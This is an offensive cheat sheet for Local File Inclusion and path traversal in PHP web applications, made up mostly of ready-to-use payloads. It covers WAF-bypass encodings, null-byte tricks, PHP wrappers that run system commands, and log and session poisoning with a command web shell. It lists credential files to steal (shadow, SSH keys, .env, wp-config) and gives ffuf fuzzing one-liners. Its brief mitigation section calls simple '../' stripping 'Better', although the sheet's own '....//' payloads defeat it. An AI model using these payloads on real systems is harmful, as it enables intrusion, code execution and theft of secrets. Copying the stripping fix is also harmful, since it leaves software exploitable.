Introduction
Local File Inclusion (LFI)
LFI vulnerabilities allow an attacker to include files on a server through the web browser. This vulnerability occurs when a web application includes a file without properly sanitizing the input, allowing attackers to access sensitive files on the server.
Path Traversal (Directory Traversal)
Path Traversal allows an attacker to access files and directories outside of the web root folder by manipulating variables that reference files with “../” sequences and its variations.
Basic Exploitation Techniques
Standard Path Traversal Vectors
1
2
3
| http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?file=../../../etc/passwd
http://example.com/index.php?file=/etc/passwd
|
Common Vulnerable Parameters
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| page
file
path
dir
document
folder
root
conf
inc
include
show
target
path
style
pdf
template
php_path
|
Path Traversal Techniques
Basic Directory Traversal
1
2
3
4
| ../
../ (multiple)
../../../
....//....//....//
|
Absolute Paths (when directory traversal is filtered)
1
2
3
| /etc/passwd
/var/www/html/index.php
C:\Windows\System32\drivers\etc\hosts
|
WAF Bypass Techniques
1. Path & Slash Obfuscation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ..././
...\.\
.././
./././
..//..//
..////
..\..\
..%252f..%252f
%2e%2e%2f
%2e%2e/
..%c0%af
%5c../
..\
..%255c
|
2. Encoding Techniques
URL Encoding
1
2
3
4
| %2e%2e%2f = ../
%2e%2e/ = ../
%2f = /
%5c = \
|
Double URL Encoding
1
2
| %252e%252e%252f = ../
%252f = /
|
Unicode/UTF-8 Encoding
1
2
| %c0%ae%c0%ae%c0%af = ../
%e0%80%ae%e0%80%ae%e0%80%af = ../
|
3. Path Normalization Bypass
1
2
3
4
5
| ..././
....//
.././
./././
..//..//
|
4. Null Byte Injection (works in older PHP versions)
1
2
3
4
| ../../../etc/passwd%00
../../../etc/passwd\0
../../../etc/passwd%00.jpg
../../../etc/passwd%2500
|
5. Traversal Sequence Variation
1
2
3
4
5
| ..../
....\
....//
....\\
..../////
|
6. Protocol Exploitation
1
2
| file:///etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
|
Advanced LFI Exploitation
PHP Wrappers & Filters
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # Base64 encode to avoid execution and read source
php://filter/convert.base64-encode/resource=index.php
# Read source code without execution
php://filter/read=convert.base64-encode/resource=index.php
# Execute commands
php://input
[POST data: <?php system('id'); ?>]
# Execute from data
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
# Zip wrapper
zip://path/to/uploaded/file.zip#phpscript.php
|
Log Poisoning (Log File Inclusion)
- Inject PHP code into log files
1
2
3
4
5
| # User-Agent poisoning
User-Agent: <?php system($_GET['cmd']); ?>
# Then access log file
http://example.com/index.php?page=../../../var/log/apache2/access.log&cmd=id
|
- Common log file locations
1
2
3
4
5
6
7
8
| /var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/proc/self/environ
/proc/self/fd/X
|
Session File Inclusion
- Inject PHP code into session variable
1
2
3
4
5
| # Set PHP code in a cookie or request parameter used in session
Cookie: PHPSESSID=<?php system('id'); ?>
# Then include the session file
http://example.com/index.php?page=../../../var/lib/php/sessions/sess_[SESSIONID]
|
- Common session file locations
1
2
3
4
| /var/lib/php/sessions/sess_*
/tmp/sess_*
/tmp/sessions/*
C:\Windows\Temp\*.php*
|
/proc/ Exploitation
1
2
3
4
5
6
| /proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/maps
|
Common Files to Target
Unix / Linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| /etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/etc/mysql/my.cnf
/etc/ssh/sshd_config
/etc/resolv.conf
/home/[user]/.bash_history
/home/[user]/.ssh/id_rsa
/home/[user]/.ssh/authorized_keys
/var/log/auth.log
/var/www/html/index.php
/var/www/html/wp-config.php
/var/www/html/configuration.php
/var/www/html/config.php
/var/www/html/.env
|
Windows
1
2
3
4
5
6
7
8
9
10
| C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\WINDOWS\system32\eula.txt
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\Windows\repair\sam
C:\Windows\repair\system
C:\Windows\repair\software
C:\Windows\panther\unattend.xml
C:\Users\[username]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
Application-specific Files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| # Apache
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
# PHP
/etc/php/X.Y/php.ini
/etc/php-fpm.d/www.conf
# MySQL
/etc/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
# WordPress
/var/www/html/wp-config.php
# Magento
/app/etc/local.xml
# Drupal
/sites/default/settings.php
# Laravel
/.env
# Joomla
/configuration.php
|
Chaining Techniques for WAF Bypass
1. Multiple Encoding + Traversal
1
| %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
|
2. Path Truncation + Null Byte
1
| ../../../../../../../../../etc/passwd.........................x%00
|
3. Combining Different Encoding Types
1
2
| %25%32%65%25%32%65%25%32%66etc%25%32%66passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
|
4. Mixed Traversal Sequences
1
2
3
| ....//....//....//etc/passwd
..../\../\../\../etc/passwd
../\../\../\../etc/passwd
|
5. Protocol Wrappers + Encoding
1
| php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2fetc%2fpasswd
|
Preventing and Mitigating LFI/Path Traversal
1
2
3
4
5
6
7
8
9
10
11
| // Bad - Vulnerable
include($_GET['file']);
// Better - Whitelist validation
$allowed_files = ['home', 'about', 'contact'];
if (in_array($_GET['file'], $allowed_files)) {
include($_GET['file'] . '.php');
}
// Better - Remove traversal sequences
$file = str_replace('../', '', $_GET['file']);
|
Secure Configurations
1
2
3
4
5
6
7
8
9
| # PHP settings
allow_url_fopen = Off
allow_url_include = Off
# Apache settings
<Directory />
Options -Indexes
AllowOverride None
</Directory>
|
- LFISuite: https://github.com/D35m0nd142/LFISuite
- LFImap: https://github.com/hansmach1ne/LFImap
- liffy: https://github.com/mzfr/liffy
- kadimus: https://github.com/P0cL4bs/kadimus
- ffuf: https://github.com/ffuf/ffuf (For fuzzing potentially vulnerable parameters)
- Burp Suite - Intruder with path traversal payloads
One-liner Scripts
1
2
3
4
5
6
7
8
| # Enumerate potential LFI parameters
ffuf -w /path/to/params.txt -u "http://target.com/index.php?FUZZ=value" -fs 4242
# Test for LFI vulnerability
ffuf -w /path/to/traversal.txt -u "http://target.com/index.php?page=FUZZ" -fs 4242
# Fuzz both parameter and traversal path
ffuf -w /path/to/params.txt:PARAM -w /path/to/traversal.txt:TRAVERSE -u "http://target.com/index.php?PARAM=TRAVERSE" -fs 4242
|
Real-World Examples
Example 1: Simple LFI
1
| http://vulnerable.com/index.php?page=../../../etc/passwd
|
Example 2: WAF Bypass with Encoding
1
| http://vulnerable.com/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
|
Example 3: PHP Filter Wrapper Bypass
1
| http://vulnerable.com/index.php?page=php://filter/convert.base64-encode/resource=../../../etc/passwd
|
Example 4: Double URL-encoded Null Byte + Traversal
1
| http://vulnerable.com/index.php?page=../../../etc/passwd%2500
|
Example 5: Controlling PHP Session Content
1
2
3
4
5
| # Set a malicious session variable
curl -X POST "http://vulnerable.com/login.php" -d "username=<?php system('id'); ?>"
# Include the session file
http://vulnerable.com/index.php?page=../../../var/lib/php/sessions/sess_[SESSIONID]
|
References